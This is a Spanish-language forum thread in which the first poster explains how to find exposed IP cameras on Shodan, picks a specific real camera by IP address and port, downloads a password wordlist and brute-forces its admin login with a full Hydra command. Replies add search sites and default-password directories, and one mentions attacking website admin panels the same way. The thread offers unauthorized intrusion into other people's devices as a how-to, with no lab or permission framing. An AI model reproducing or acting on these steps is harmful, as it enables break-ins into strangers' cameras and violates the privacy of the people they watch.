Nos ha pasado que hemos puesto alguna IP y nos mande a algún servidor web que trae admin y contraseña, Navegamos en google y no aparece nada relacionado, Lo que haremos es hacer un ataque de fuerza bruta desde kali linux
https://www.shodan.io/search?query=ip+cameras (https://www.shodan.io/search?query=ip+cameras)
Entraremos ala pagina web, Nos registramos y en el buscador ponemos ip cameras y despues de buscar la camara que queramos entraremos, En mi caso me meti a esta http://46.237.76.163:8880/ (http://46.237.76.163:8880/) La IP Es: 46.237.76.163 Se esta corriendo en el puerto:8880
Abrimos una nueva ventana y ponemos: wordlist camera github, abriremos la de jeanphorn luego descargamos o la clonamos con este comando: "git clone https://github.com/jeanphorn/wordlist.git"
Abrimos una terminal y ponemos hydra, nos saldran los comandos, Este es un ejemplo de como seria el comando: hydra -s (Puerto) 8880 -l admin -P (La Wordlist osea el txt donde vienen la contraseña) -e ns -t 16 + 46.237.76.163 (la ip) http
Quedaria asi el comando: hydra -s 8880 -l admin -P /root/Desktop/wordlist-master/passlist.txt -e ns -t 16 46.237.76.163 http
Empezara a sacar su contraseña y solo es de ir probando
(https://buffercode.in/hack-crack-web-form-passwords-using-hydra-burpsuite-kali-linux/)
Psd: Soy nuevo en el foro espero que les haya servido ;D
Gracias por el aporte también puedes usar FOFA.SO. Recuerda que debes registrarte en Shodan para al menos tengas 3 páginas de búsqueda , si no pagar los 50 pavos , recomiendo a la hora de buscar por defecto en cámaras
https://ipvm.com/reports/ip-cameras-default-passwords-directory
lo Importante es buscar marcas reconocidas .
Interesante.. nunca se me habría ocurrido hacer brute force en una camara web jajaja normalmente hago eso con los admin panel de una web.
muy bueno, tambien he de probar con burp suite!